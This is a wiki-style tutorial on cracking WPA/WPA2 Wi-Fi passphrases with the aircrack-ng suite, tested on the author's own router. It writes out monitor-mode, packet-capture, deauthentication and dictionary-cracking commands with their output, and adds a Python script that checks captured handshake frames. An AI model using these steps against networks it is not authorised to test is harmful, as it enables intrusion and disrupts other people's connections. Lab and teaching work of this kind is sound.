Notes on wireless in Kali 2.0: Kali_2.0/Wireless_Debugging
- 1 The Background
- 2 The Hardware
- 3 The Software
- 4 The Procedure
- 4.1 Set Your Router to WPA
- 4.2 Change Your Mac Address
- 4.3 Check Wireless Devices
- 4.4 Switch Wireless Device to Monitor Mode
- 4.5 Scan Networks
- 4.6 Begin the Attack
- 4.7 Finish the Attack
- 4.8 Troubleshooting
- 5 TL;DR
As with the WEP attack we covered, this attack will use aircrack-ng to capture handshake packets, as many as possible, then use those packets to brute-force guess the wireless network's passphrase.
WPA or WPA2?
There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
Here's what the security settings page might look like:
The hardware for simulating this attack on my home network consisted of:
- a router/wireless access point - this router controls the wireless network being attacked
- a laptop running Kali Linux - this is where the attack is being launched from
- a third party on the network (e.g., a phone or a desktop) - not sure if this is necessary
You'll need a laptop running Kali, which will have aircrack-ng installed. That should be all the software you need.
Set Your Router to WPA
Before doing anything else, we'll change the wireless security protocol of the router to either WPA or mixed WPA/WPA2 encryption.
Now let's pick an easy password, for the sake of example. Like, uh, the word password.
Now we've got our WPA/WPA2-enabled router with our super-secure password of "password" - time to get to work.
Change Your Mac Address
Check Wireless Devices
Now that you have your WPA/WPA2 network enabled, open up your Kali laptop. Check the wireless devices available on the computer:
Once again, we'll be using the Panda Wireless USB dongle at
Switch Wireless Device to Monitor Mode
Now use Aircrack to put the wireless device into monitoring mode:
$ airmon-ng start wlan2
This will take wlan2 down and replace it with a monitor-mode interface, wlan2mon.
Now we're ready to scan available networks and find our WPA/WPA2 router.
Scan Networks
Now you can scan the wireless access points around you by running:
$ airodump-ng wlan2mon
Make a note of your target router's channel number and MAC address.
Begin the Attack
Window 1: Monitor Traffic on the Network
In the first window, monitor traffic going to/from the target router by running a more targeted airodump-ng:
$ airodump-ng -d AA:BB:CC:DD:EE:FF -c XX -w aircrack_output wlan2mon
or, the same command with the equivalent long options:
$ airodump-ng --bssid AA:BB:CC:DD:EE:FF --channel XX -w aircrack_output wlan2mon
Make sure you've killed your prior-running airodump command, which was hopping channels, or this command will not work.
Find the Sheep
The weakness we're taking advantage of in WPA is the handshake process: when a client (an unsuspecting sheep) authenticates with the network, it exchanges values derived from the passphrase (the four-way handshake) so the network can verify the client. If an attacker captures the packets of this handshake, they hold everything needed to test guesses offline, and can try to crack the sheep's passphrase by brute force.
That means we need to find a sheep that will broadcast their passphrase to the router and anyone else who will listen. So once you're ready, and listening to the network, connect your sheep to the network. (This might be a computer playing internet radio, for example.)
Window 2: Deauthenticate Sheep
The next step is to deauthenticate the sheep.
In window 2, we'll use aireplay to craft deauth packets and send them to the sheep:
$ aireplay-ng -0 1 -a <access point mac address> -c <sheep mac address> wlan2mon
or, the same command with the long option:
$ aireplay-ng --deauth 1 -a <access pt mac addr> -c <sheep mac addr> wlan2mon
This will generate fake deauthentication packets and send them to the sheep. The sheep will think it has been deauthenticated and kicked off the network. Lonely and desperate and bleating madly, the sheep will reconnect and repeat the handshake for anyone who will listen - including the material that encodes its passphrase.
If we're listening, we can hear it, and use Aircrack to crack it.
This is Attack Mode Zero in the Aircrack manual.
Finish the Attack
Now we've got what we need in our network capture file. Let's try and crack this password.
You can use whatever you want for your wordlist; if you're attacking a network with a known passkey, just make sure it's in there. I downloaded a list of the 10,000 most common passwords ("password" is number one on the list) from SecLists on GitHub.
Now run Aircrack against the captured data to crack the WPA key, specifying the wordlist:
$ aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap
and, if you're lucky, you'll see something like this:
Aircrack-ng 1.2 rc2

[00:00:00] 5 keys tested (669.62 k/s)

KEY FOUND! [ password ]

Master Key     : 8A D8 38 DD C7 05 39 9F 02 DE 96 0F 98 E1 C2 EF
                 01 D0 A8 C4 75 C9 4A C3 04 32 E8 21 53 9E D5 1A

Transient Key  : FC BB DD FE 34 37 AC 42 D6 15 06 70 0A 2A 6B B0
                 D6 1C 6A 5C 3B 1D EE 40 C8 20 10 D1 7C 0F 5B A2
                 5A 92 8A 70 E6 36 2C DA 3E 36 6E CB AE F1 1B FC
                 78 C5 54 82 BA 84 3F DE 2D 7A BD A0 BD E0 40 AB

EAPOL HMAC     : 84 B2 3D 30 2D A0 87 D1 A3 2A AC 14 71 28 B5 82
Passphrase Not Found
This was the first result I saw, when I tried to crack my wireless password "password" with a wordlist that had "password" right there at the top:
$ aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap
Opening aircrack_output-05.cap
Read 81013 packets.

   #  BSSID              ESSID                     Encryption

   1  74:85:2A:97:5B:08  Walrus                    WPA (1 handshake)

Choosing first network as target.

Opening aircrack_output-05.cap
Reading packets, please wait...

Aircrack-ng 1.2 rc2

[00:00:00]  192 keys tested (1269.55 k/s)
[00:00:00]  392 keys tested (1287.03 k/s)   Current passphrase: cadillac
[00:00:00]  592 keys tested (1298.17 k/s)   Current passphrase: mariners
[00:00:00]  788 keys tested (1293.03 k/s)   Current passphrase: commando
[00:00:00]  988 keys tested (1293.68 k/s)   Current passphrase: films+pic+galeries
[00:00:00] 1188 keys tested (1297.01 k/s)   Current passphrase: vikings1
[00:00:01] 1384 keys tested (1298.15 k/s)   Current passphrase: hotmail1
[00:00:01] 1580 keys tested (1298.30 k/s)   Current passphrase: aviation
[00:00:01] 1776 keys tested (1298.07 k/s)   Current passphrase: riffraff
[00:00:01] 1964 keys tested (1293.49 k/s)   Current passphrase: smirnoff
                                            Current passphrase: skeeter1

Passphrase not in dictionary
Quitting aircrack-ng...
Possible Failure Points
Aircrack can only crack pre-shared keys (PSK). Is my wireless network listed as having PSK? Yes. (AUTH column in airodump-ng)
Aircrack can only handle dictionary words and short passphrases. Is my test router's password too hard? Pretty sure that if a password cracker can't crack a password of "password," it is an abject failure.
Not letting it run long enough? I suspect this may be the issue.
Problems with packet injection? No, everything looks okay. Here are Aircrack/Packet Injection Testing notes.
Something peculiar about my network? Possibly. Almost definitely. The same procedure was successful on two other wireless router makes/models.
Wireshark for Troubleshooting
You can use Wireshark to analyze some of these packet captures. From this site: "Use Wireshark and apply a filter of 'eapol'. This displays only eapol packets you are interested in. Thus you can see if capture contains 0, 1, 2, 3 or 4 eapol packets."
From this page comes a great explanation of how to analyze those packets.
On the first successful network, filtering for eapol packets shows that we had four different sources, which took about 10 minutes to capture.
On the second successful network, filtering eapol packets shows three different sources, and those took about 15 minutes to capture.
On the network setup that is failing, filtering eapol packets shows eapol packets coming from a single destination, despite an hour of capturing packets.
On another (failed) attempt against a network that was later successfully attacked, we had only two sources of eapol packets.
All in all, this means you may need multiple clients on the network - as I observed, the important thing is not having a lot of traffic but having a lot of clients connected and sending EAPOL packets.
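To make the Wireshark "eapol" check above concrete, and the handshake description under "Find the Sheep" with it, here is an added example that is not part of the original notes: it classifies EAPOL-Key frames into the four handshake messages from their Key Information flags and reports, per client, which messages a capture actually holds, so an incomplete capture (one client only ever receiving message 1) is visible at a glance. The frames, client MACs and the `eapol_key` builder are constructed for the example; a real run would feed it frames pulled from a .cap file with the 802.11 and LLC headers stripped.

```python
import struct
from collections import defaultdict

# EAPOL-Key "Key Information" flag bits (IEEE 802.11 RSN key descriptor).
INSTALL, ACK, MIC, SECURE = 0x0040, 0x0080, 0x0100, 0x0200

def classify_eapol_key(frame: bytes):
    """Return 1..4 for a 4-way handshake message, else None (EAPOL type 3 = Key; descriptor 2 = RSN, 254 = WPA1)."""
    if len(frame) < 7 or frame[1] != 3 or frame[4] not in (2, 254):
        return None
    key_info = struct.unpack("!H", frame[5:7])[0]
    ack, mic, install, secure = (bool(key_info & f) for f in (ACK, MIC, INSTALL, SECURE))
    if ack and not mic:
        return 1                        # AP -> STA: ANonce
    if mic and not ack and not secure:
        return 2                        # STA -> AP: SNonce + MIC
    if ack and mic and install and secure:
        return 3                        # AP -> STA: GTK, install PTK
    if mic and not ack and secure and not install:
        return 4                        # STA -> AP: confirmation
    return None

def handshake_summary(frames):
    """frames: (src, dst, eapol_bytes) with 802.11/LLC headers already stripped."""
    seen = defaultdict(set)
    for src, dst, eapol in frames:
        msg = classify_eapol_key(eapol)
        if msg is not None:
            client = dst if msg in (1, 3) else src   # M1/M3 travel AP -> STA
            seen[client].add(msg)
    return {client: sorted(msgs) for client, msgs in seen.items()}

def eapol_key(key_info):
    """Constructed sample: minimal EAPOL-Key frame, every field but the flags zeroed."""
    body = bytes([2]) + struct.pack("!H", key_info) + bytes(92)
    return struct.pack("!BBH", 2, 3, len(body)) + body

# Constructed capture: client A completes the handshake, client B only ever
# receives message 1, which is what the failing capture in these notes shows.
AP, STA_A, STA_B = "74:85:2a:97:5b:08", "02:00:00:00:00:01", "02:00:00:00:00:02"
SAMPLE_FRAMES = [
    (AP, STA_A, eapol_key(0x008A)), (STA_A, AP, eapol_key(0x010A)),
    (AP, STA_A, eapol_key(0x13CA)), (STA_A, AP, eapol_key(0x030A)),
    (AP, STA_B, eapol_key(0x008A)), (AP, STA_B, eapol_key(0x008A)),
]

if __name__ == "__main__":
    for client, msgs in handshake_summary(SAMPLE_FRAMES).items():
        state = "complete" if msgs == [1, 2, 3, 4] else "incomplete"
        print(f"{client}: messages {msgs} ({state})")
```

The flag values 0x008A, 0x010A, 0x13CA and 0x030A are the Key Information words Wireshark typically shows for messages 1 to 4 of a WPA2-CCMP handshake.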
TL;DR
Alright, smartass, here you go:
$ airmon-ng                                   # list wireless devices
$ airmon-ng start wlan2                       # put wlan2 in monitor mode
$ airodump-ng wlan2mon                        # monitor
$ airodump-ng --bssid AA:BB:CC:DD:EE:FF -c XX -w aircrack_output wlan2mon   # capture packets from target network
$ aircrack-ng -w ./wordlist.txt aircrack_output-01.cap   # crack the passphrase
aircrack-ng: a suite of tools for wireless cracking.
Many Ways to Crack a Wifi: Cracking Wifi
Aircrack Benchmarking: Aircrack/Benchmarking
WEP Attacks with Aircrack: Aircrack/WEP Cracking
WPA Attacks with Aircrack: Aircrack/WPA Cracking
Aircrack Hardware: Aircrack/Packet Injection Testing
Basic Usage of Airodump